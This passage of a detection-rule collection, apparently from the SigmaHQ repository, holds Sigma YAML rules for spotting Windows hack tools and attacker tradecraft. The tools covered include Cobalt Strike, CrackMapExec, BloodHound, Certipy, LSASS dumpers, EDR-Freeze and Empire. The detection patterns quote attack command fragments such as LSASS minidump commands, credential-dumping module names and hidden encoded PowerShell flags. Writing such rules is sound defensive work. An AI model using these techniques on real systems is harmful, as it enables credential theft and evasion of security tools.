    "content": "title: Suspicious HH.EXE Execution\nid: e8a95b5e-c891-46e2-b33a-93937d3abc31\nstatus: test\ndescription: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)\nreferences:\n    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/\n    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7\n    - https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/\n    - https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37\nauthor: Maxim Pavlunin\ndate: 2020-04-01\nmodified: 2023-04-12\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.initial-access\n    - attack.t1047\n    - attack.t1059.001\n    - attack.t1059.003\n    - attack.t1059.005\n    - attack.t1059.007\n    - attack.t1218\n    - attack.t1218.001\n    - attack.t1218.010\n    - attack.t1218.011\n    - attack.t1566\n    - attack.t1566.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'HH.exe'\n        - Image|endswith: '\\hh.exe'\n    selection_paths:\n        CommandLine|contains:\n            - '.application'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Content.Outlook\\'\n            - '\\Downloads\\'\n            - '\\Users\\Public\\'\n            - '\\Windows\\Temp\\'\n            # - '\\AppData\\Local\\Temp\\Temp?_'\n            # - '\\AppData\\Local\\Temp\\Rar$'\n            # - '\\AppData\\Local\\Temp\\7z'\n            # - '\\AppData\\Local\\Temp\\wz'\n            # - '\\AppData\\Local\\Temp\\peazip-tmp'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_adcspwn.yml",
    "content": "title: HackTool - ADCSPwn Execution\nid: cd8c163e-a19b-402e-bdd5-419ff5859f12\nstatus: test\ndescription: Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an Active Directory network by coercing authentication from machine accounts and relaying it to the certificate service\nreferences:\n    - https://github.com/bats3c/ADCSPwn\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-07-31\nmodified: 2023-02-04\ntags:\n    - attack.collection\n    - attack.credential-access\n    - attack.t1557.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - ' --adcs '\n            - ' --port '\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_bloodhound_sharphound.yml",
    "content": "title: HackTool - Bloodhound/Sharphound Execution\nid: f376c8a7-a2d0-4ddc-aa0c-16c17236d962\nstatus: test\ndescription: Detects command line parameters used by the Bloodhound and Sharphound hack tools\nreferences:\n    - https://github.com/BloodHoundAD/BloodHound\n    - https://github.com/BloodHoundAD/SharpHound\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-12-20\nmodified: 2023-02-04\ntags:\n    - attack.discovery\n    - attack.t1087.001\n    - attack.t1087.002\n    - attack.t1482\n    - attack.t1069.001\n    - attack.t1069.002\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Product|contains: 'SharpHound'\n        - Description|contains: 'SharpHound'\n        - Company|contains:\n              - 'SpecterOps'\n              - 'evil corp'\n        - Image|contains:\n              - '\\Bloodhound.exe'\n              - '\\SharpHound.exe'\n    selection_cli_1:\n        CommandLine|contains:\n            - ' -CollectionMethod All '\n            - ' --CollectionMethods Session '\n            - ' --Loop --Loopduration '\n            - ' --PortScanTimeout '\n            - '.exe -c All -d '\n            - 'Invoke-Bloodhound'\n            - 'Get-BloodHoundData'\n    selection_cli_2:\n        CommandLine|contains|all:\n            - ' -JsonFolder '\n            - ' -ZipFileName '\n    selection_cli_3:\n        CommandLine|contains|all:\n            - ' DCOnly '\n            - ' --NoSaveCache '\n    condition: 1 of selection_*\nfalsepositives:\n    - Other programs that use these command line options and accept an 'All' parameter\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_c3_rundll32_pattern.yml",
    "content": "title: HackTool - F-Secure C3 Load by Rundll32\nid: b18c9d4c-fac9-4708-bd06-dd5bfacf200f\nstatus: test\ndescription: F-Secure C3 produces DLLs with a default exported StartNodeRelay function.\nreferences:\n    - https://github.com/FSecureLABS/C3/blob/11a081fd3be2aaf2a879f6b6e9a96ecdd24966ef/Src/NodeRelayDll/NodeRelayDll.cpp#L12\nauthor: Alfie Champion (ajpc500)\ndate: 2021-06-02\nmodified: 2023-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'rundll32.exe'\n            - '.dll'\n            - 'StartNodeRelay'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_certify.yml",
    "content": "title: HackTool - Certify Execution\nid: 762f2482-ff21-4970-8939-0aa317a886bb\nstatus: test\ndescription: Detects Certify, a tool for Active Directory certificate abuse, based on PE metadata characteristics and common command line arguments.\nreferences:\n    - https://github.com/GhostPack/Certify\nauthor: pH-T (Nextron Systems)\ndate: 2023-04-17\nmodified: 2023-04-25\ntags:\n    - attack.discovery\n    - attack.credential-access\n    - attack.t1649\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\Certify.exe'\n        - OriginalFileName: 'Certify.exe'\n        - Description|contains: 'Certify'\n    selection_cli_commands:\n        CommandLine|contains:\n            - '.exe cas '\n            - '.exe find '\n            - '.exe pkiobjects '\n            - '.exe request '\n            - '.exe download '\n    selection_cli_options:\n        CommandLine|contains:\n            - ' /vulnerable'\n            - ' /template:'\n            - ' /altname:'\n            - ' /domain:'\n            - ' /path:'\n            - ' /ca:'\n    condition: selection_img or all of selection_cli_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_certipy.yml",
    "content": "title: HackTool - Certipy Execution\nid: 6938366d-8954-4ddc-baff-c830b3ba8fcd\nstatus: test\ndescription: |\n    Detects Certipy execution, a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.\nreferences:\n    - https://github.com/ly4k/Certipy\n    - https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7\nauthor: pH-T (Nextron Systems), Sittikorn Sangrattanapitak\ndate: 2023-04-17\nmodified: 2024-10-08\ntags:\n    - attack.discovery\n    - attack.credential-access\n    - attack.t1649\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\Certipy.exe'\n        - OriginalFileName: 'Certipy.exe'\n        - Description|contains: 'Certipy'\n    selection_cli_commands:\n        CommandLine|contains:\n            - ' account '\n            - ' auth '\n            # - ' ca ' # Too short to be used with just one CLI\n            - ' cert '\n            - ' find '\n            - ' forge '\n            - ' ptt '\n            - ' relay '\n            - ' req '\n            - ' shadow '\n            - ' template '\n    selection_cli_flags:\n        CommandLine|contains:\n            - ' -bloodhound'\n            - ' -ca-pfx '\n            - ' -dc-ip '\n            - ' -kirbi'\n            - ' -old-bloodhound'\n            - ' -pfx '\n            - ' -target'\n            - ' -template'\n            - ' -username '\n            - ' -vulnerable'\n            - 'auth -pfx'\n            - 'shadow auto'\n            - 'shadow list'\n    condition: selection_img or all of selection_cli_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml",
    "content": "title: Operator Bloopers Cobalt Strike Commands\nid: 647c7b9e-d784-4fda-b9a0-45c565a7b729\nrelated:\n    - id: 4f154fb6-27d1-4813-a759-78b93e0b9c48\n      type: similar\nstatus: test\ndescription: Detects use of Cobalt Strike commands accidentally entered in the CMD shell\nreferences:\n    - https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf\n    - https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/\n    - https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/\nauthor: _pete_0, TheDFIRReport\ndate: 2022-05-06\nmodified: 2023-01-30\ntags:\n    - attack.execution\n    - attack.t1059.003\n    - stp.1u\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'Cmd.Exe'\n        - Image|endswith: '\\cmd.exe'\n    selection_cli:\n        CommandLine|startswith:\n            - 'cmd '\n            - 'cmd.exe'\n            - 'c:\\windows\\system32\\cmd.exe'\n        CommandLine|contains:\n            - 'psinject'\n            - 'spawnas'\n            - 'make_token'\n            - 'remote-exec'\n            - 'rev2self'\n            - 'dcsync'\n            - 'logonpasswords'\n            - 'execute-assembly'\n            - 'getsystem'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml",
    "content": "title: Operator Bloopers Cobalt Strike Modules\nid: 4f154fb6-27d1-4813-a759-78b93e0b9c48\nrelated:\n    - id: 647c7b9e-d784-4fda-b9a0-45c565a7b729\n      type: similar\nstatus: test\ndescription: Detects Cobalt Strike module/commands accidentally entered in CMD shell\nreferences:\n    - https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf\n    - https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/\n    - https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/\nauthor: _pete_0, TheDFIRReport\ndate: 2022-05-06\nmodified: 2023-01-30\ntags:\n    - attack.execution\n    - attack.t1059.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'Cmd.Exe'\n        - Image|endswith: '\\cmd.exe'\n    selection_cli:\n        CommandLine|contains:\n            - 'Invoke-UserHunter'\n            - 'Invoke-ShareFinder'\n            - 'Invoke-Kerberoast'\n            - 'Invoke-SMBAutoBrute'\n            - 'Invoke-Nightmare'\n            - 'zerologon'\n            - 'av_query'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml",
    "content": "title: CobaltStrike Load by Rundll32\nid: ae9c6a7c-9521-42a6-915e-5aaa8689d529\nstatus: test\ndescription: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.\nreferences:\n    - https://www.cobaltstrike.com/help-windows-executable\n    - https://redcanary.com/threat-detection-report/\n    - https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/\nauthor: Wojciech Lesicki\ndate: 2021-06-01\nmodified: 2022-09-16\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_rundll:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: RUNDLL32.EXE\n        - CommandLine|contains:\n              - 'rundll32.exe'\n              - 'rundll32 '\n    selection_params:\n        CommandLine|contains: '.dll'\n        CommandLine|endswith:\n            - ' StartW'\n            - ',StartW'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_process_patterns.yml",
    "content": "title: Potential CobaltStrike Process Patterns\nid: f35c5d71-b489-4e22-a115-f003df287317\nstatus: test\ndescription: Detects potential process patterns related to Cobalt Strike beacon activity\nreferences:\n    - https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/\n    - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-07-27\nmodified: 2023-03-29\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_generic_1:\n        CommandLine|endswith: 'cmd.exe /C whoami'\n        ParentImage|startswith: 'C:\\Temp\\'\n    selection_generic_2:\n        ParentImage|endswith:\n            - '\\runonce.exe'\n            - '\\dllhost.exe'\n        CommandLine|contains|all:\n            - 'cmd.exe /c echo'\n            - '> \\\\\\\\.\\\\pipe'\n    selection_conhost_1:\n        ParentCommandLine|contains|all:\n            - 'cmd.exe /C echo'\n            - ' > \\\\\\\\.\\\\pipe'\n        CommandLine|endswith: 'conhost.exe 0xffffffff -ForceV1'\n    selection_conhost_2:\n        ParentCommandLine|endswith: '/C whoami'\n        CommandLine|endswith: 'conhost.exe 0xffffffff -ForceV1'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_coercedpotato.yml",
    "content": "title: HackTool - CoercedPotato Execution\nid: e8d34729-86a4-4140-adfd-0a29c2106307\nstatus: test\ndescription: Detects the use of CoercedPotato, a tool for privilege escalation\nreferences:\n    - https://github.com/hackvens/CoercedPotato\n    - https://blog.hackvens.fr/articles/CoercedPotato.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2023-10-11\nmodified: 2024-11-23\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_loader_img:\n        Image|endswith: '\\CoercedPotato.exe'\n    selection_params:\n        CommandLine|contains: ' --exploitId '\n    selection_loader_imphash:\n        Hashes|contains:\n            - 'IMPHASH=A75D7669DB6B2E107A44C4057FF7F7D6'\n            - 'IMPHASH=F91624350E2C678C5DCBE5E1F24E22C9'\n            - 'IMPHASH=14C81850A079A87E83D50CA41C709A15'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_covenant.yml",
    "content": "title: HackTool - Covenant PowerShell Launcher\nid: c260b6db-48ba-4b4a-a76f-2f67644e99d2\nstatus: test\ndescription: Detects suspicious command lines used in Covenant luanchers\nreferences:\n    - https://posts.specterops.io/covenant-v0-5-eee0507b85ba\nauthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community\ndate: 2020-06-04\nmodified: 2023-02-21\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1059.001\n    - attack.t1564.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        CommandLine|contains|all:\n            - '-Sta'\n            - '-Nop'\n            - '-Window'\n            - 'Hidden'\n        CommandLine|contains:\n            - '-Command'\n            - '-EncodedCommand'\n    selection_2:\n        CommandLine|contains:\n            - 'sv o (New-Object IO.MemorySteam);sv d '\n            - 'mshta file.hta'\n            - 'GruntHTTP'\n            - '-EncodedCommand cwB2ACAAbwAgA'\n    condition: 1 of selection_*\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml",
    "content": "title: HackTool - CrackMapExec Execution\nid: 42a993dd-bb3e-48c8-b372-4d6684c4106c\nstatus: test\ndescription: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.\nreferences:\n    - https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local\n    - https://www.mandiant.com/resources/telegram-malware-iranian-espionage\n    - https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz\n    - https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-25\nmodified: 2023-03-08\ntags:\n    - attack.execution\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.credential-access\n    - attack.discovery\n    - attack.t1047\n    - attack.t1053\n    - attack.t1059.003\n    - attack.t1059.001\n    - attack.t1110\n    - attack.t1201\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_binary:\n        Image|endswith: '\\crackmapexec.exe'\n    selection_special:\n        CommandLine|contains: ' -M pe_inject '\n    selection_execute:\n        CommandLine|contains|all:\n            - ' --local-auth'\n            - ' -u '\n            - ' -x '\n    selection_hash:\n        CommandLine|contains|all:\n            - ' --local-auth'\n            - ' -u '\n            - ' -p '\n            - \" -H 'NTHASH'\"\n    selection_module_mssql:\n        CommandLine|contains|all:\n            - ' mssql '\n            - ' -u '\n            - ' -p '\n            - ' -M '\n            - ' -d '\n    selection_module_smb1:\n        CommandLine|contains|all:\n            - ' smb '\n            - ' -u '\n            - ' -H '\n            - ' -M '\n            - ' -o '\n    selection_module_smb2:\n        CommandLine|contains|all:\n            - ' smb '\n            - ' -u '\n            - ' -p '\n            - ' 
--local-auth'\n    part_localauth_1:\n        CommandLine|contains|all:\n            - ' --local-auth'\n            - ' -u '\n            - ' -p '\n    part_localauth_2:\n        CommandLine|contains|all:\n            - ' 10.'\n            - ' 192.168.'\n            - '/24 '\n    condition: 1 of selection_* or all of part_localauth*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_execution_patterns.yml",
    "content": "title: HackTool - CrackMapExec Execution Patterns\nid: 058f4380-962d-40a5-afce-50207d36d7e2\nstatus: stable\ndescription: Detects various execution patterns of the CrackMapExec pentesting framework\nreferences:\n    - https://github.com/byt3bl33d3r/CrackMapExec\nauthor: Thomas Patzke\ndate: 2020-05-22\nmodified: 2023-11-06\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.execution\n    - attack.t1047\n    - attack.t1053\n    - attack.t1059.003\n    - attack.t1059.001\n    - attack.s0106\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            # cme/protocols/smb/wmiexec.py (generalized execute_remote and execute_fileless)\n            - 'cmd.exe /Q /c * 1> \\\\\\\\*\\\\*\\\\* 2>&1'\n            # cme/protocols/smb/atexec.py:109 (fileless output via share)\n            - 'cmd.exe /C * > \\\\\\\\*\\\\*\\\\* 2>&1'\n            # cme/protocols/smb/atexec.py:111 (fileless output via share)\n            - 'cmd.exe /C * > *\\\\Temp\\\\* 2>&1'\n            # https://github.com/byt3bl33d3r/CrackMapExec/blob/d8c50c8cbaf36c29329078662473f75e440978d2/cme/helpers/powershell.py#L136 (PowerShell execution with obfuscation)\n            - 'powershell.exe -exec bypass -noni -nop -w 1 -C \"'\n            # https://github.com/byt3bl33d3r/CrackMapExec/blob/d8c50c8cbaf36c29329078662473f75e440978d2/cme/helpers/powershell.py#L160 (PowerShell execution without obfuscation)\n            - 'powershell.exe -noni -nop -w 1 -enc '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_patterns.yml",
    "content": "title: HackTool - CrackMapExec Process Patterns\nid: f26307d8-14cd-47e3-a26b-4b4769f24af6\nstatus: test\ndescription: Detects suspicious process patterns found in logs when CrackMapExec is used\nreferences:\n    - https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-12\nmodified: 2023-02-13\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_lsass_dump1:\n        CommandLine|contains|all:\n            - 'tasklist /fi '\n            - 'Imagename eq lsass.exe'\n        CommandLine|contains:\n            - 'cmd.exe /c '\n            - 'cmd.exe /r '\n            - 'cmd.exe /k '\n            - 'cmd /c '\n            - 'cmd /r '\n            - 'cmd /k '\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    selection_lsass_dump2:\n        CommandLine|contains|all:\n            - 'do rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump'\n            - '\\Windows\\Temp\\'\n            - ' full'\n            - '%%B'\n    selection_procdump:\n        CommandLine|contains|all:\n            - 'tasklist /v /fo csv'\n            - 'findstr /i \"lsass\"'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml",
    "content": "title: HackTool - CrackMapExec PowerShell Obfuscation\nid: 6f8b3439-a203-45dc-a88b-abf57ea15ccf\nstatus: test\ndescription: The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.\nreferences:\n    - https://github.com/byt3bl33d3r/CrackMapExec\n    - https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242\nauthor: Thomas Patzke\ndate: 2020-05-22\nmodified: 2023-02-21\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.defense-evasion\n    - attack.t1027.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cli:\n        CommandLine|contains:\n            - 'join*split'\n            # Line 343ff\n            - '( $ShellId[1]+$ShellId[13]+''x'')'\n            - '( $PSHome[*]+$PSHOME[*]+'\n            - '( $env:Public[13]+$env:Public[5]+''x'')'\n            - '( $env:ComSpec[4,*,25]-Join'''')'\n            - '[1,3]+''x''-Join'''')'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_createminidump.yml",
    "content": "title: HackTool - CreateMiniDump Execution\nid: 36d88494-1d43-4dc0-b3fa-35c8fea0ca9d\nstatus: test\ndescription: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine\nreferences:\n    - https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-12-22\nmodified: 2024-11-23\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\CreateMiniDump.exe'\n        - Hashes|contains: 'IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_dinjector.yml",
    "content": "title: HackTool - DInjector PowerShell Cradle Execution\nid: d78b5d61-187d-44b6-bf02-93486a80de5a\nstatus: test\ndescription: Detects the use of the Dinject PowerShell cradle based on the specific flags\nreferences:\n    - https://web.archive.org/web/20211001064856/https://github.com/snovvcrash/DInjector # Original got deleted. This is a fork\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-12-07\nmodified: 2023-02-04\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1055\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - ' /am51'\n            - ' /password'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_doppelganger.yml",
    "content": "title: HackTool - Doppelanger LSASS Dumper Execution\nid: d474c8fe-bb69-4ea0-b7d9-f682b56d52d3\nstatus: experimental\ndescription: Detects the execution of the Doppelanger hacktool which is used to dump LSASS memory via process cloning while evading common detection methods\nreferences:\n    - https://labs.yarix.com/2025/06/doppelganger-an-advanced-lsass-dumper-with-process-cloning/\n    - https://github.com/vari-sh/RedTeamGrimoire/tree/668e0357072546065729ad623f8c02f7be21bb08/Doppelganger\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-07-01\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\Doppelganger.exe'\n        - Hashes|contains:\n              - 'IMPHASH=AB94D5217896ADCD765A06B2D52F0AEB'\n              - 'IMPHASH=65F0EA61156EE0C2A35421926F0C7F78'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_dumpert.yml",
    "content": "title: HackTool - Dumpert Process Dumper Execution\nid: 2704ab9e-afe2-4854-a3b1-0c0706d03578\nstatus: test\ndescription: Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory\nreferences:\n    - https://github.com/outflanknl/Dumpert\n    - https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-02-04\nmodified: 2025-01-22\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Hashes|contains: 'MD5=09D278F9DE118EF09163C6140255C690'\n        - CommandLine|contains: 'Dumpert.dll'\n    condition: selection\nfalsepositives:\n    - Very unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_edr_freeze.yml",
    "content": "title: Hacktool - EDR-Freeze Execution\nid: c598cc0c-9e70-4852-b9eb-8921af79f598\nstatus: experimental\ndescription: |\n    Detects execution of EDR-Freeze, a tool that exploits the MiniDumpWriteDump function and WerFaultSecure.exe to suspend EDR and Antivirus processes on Windows.\n    EDR-Freeze leverages a race-condition attack to put security processes into a dormant state by suspending WerFaultSecure at the moment it freezes the target process.\n    This technique does not require kernel-level exploits or BYOVD, but instead abuses user-mode functionality to temporarily disable monitoring by EDR or Antimalware solutions.\nreferences:\n    - https://www.zerosalarium.com/2025/09/EDR-Freeze-Puts-EDRs-Antivirus-Into-Coma.html\n    - https://github.com/TwoSevenOneT/EDR-Freeze\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-09-24\nmodified: 2025-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|contains:\n            - '\\EDR-Freeze'\n            - '\\EDRFreeze'\n        Image|endswith: '.exe'\n    selection_imphash:\n        Hashes|contains:\n            - 'IMPHASH=1195F7935954A2CD09157390C33F8E8C'\n            - 'IMPHASH=129F58DE3D687FB7F012BF6C3D679997'\n            - 'IMPHASH=2C617A175D0086251642C6619F7CC8BA'\n            - 'IMPHASH=8828F0B906F7844358FB92A899E9520F'\n            - 'IMPHASH=AF76D95157EC554DC1EF178E4E66D447'\n            - 'IMPHASH=E1B04316B61ACA31DD52ABBEC0A37FD5'\n            - 'IMPHASH=8B2D5B54AFCFEC60D54F6B31D80ED4A0'\n            - 'IMPHASH=AB8BB31EDD91D2A05FE7B62A535E9EB7'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_hktl_edr_freeze/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_edrsilencer.yml",
    "content": "title: HackTool - EDRSilencer Execution\nid: eb2d07d4-49cb-4523-801a-da002df36602\nstatus: test\ndescription: |\n    Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information.\nreferences:\n    - https://github.com/netero1010/EDRSilencer\nauthor: '@gott_cyber'\ndate: 2024-01-02\ntags:\n    - attack.defense-evasion\n    - attack.t1562\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\EDRSilencer.exe'\n        - OriginalFileName: 'EDRSilencer.exe'\n        - Description|contains: 'EDRSilencer'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_empire_powershell_launch.yml",
    "content": "title: HackTool - Empire PowerShell Launch Parameters\nid: 79f4ede3-402e-41c8-bc3e-ebbf5f162581\nstatus: test\ndescription: Detects suspicious powershell command line parameters used in Empire\nreferences:\n    - https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165\n    - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191\n    - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178\n    - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-04-20\nmodified: 2023-02-21\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - ' -NoP -sta -NonI -W Hidden -Enc '\n            - ' -noP -sta -w 1 -enc '\n            - ' -NoP -NonI -W Hidden -enc '\n            - ' -noP -sta -w 1 -enc'\n            - ' -enc  SQB'\n            - ' -nop -exec bypass -EncodedCommand '\n    condition: selection\nfalsepositives:\n    - Other tools that incidentally use the same command line parameters\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml",
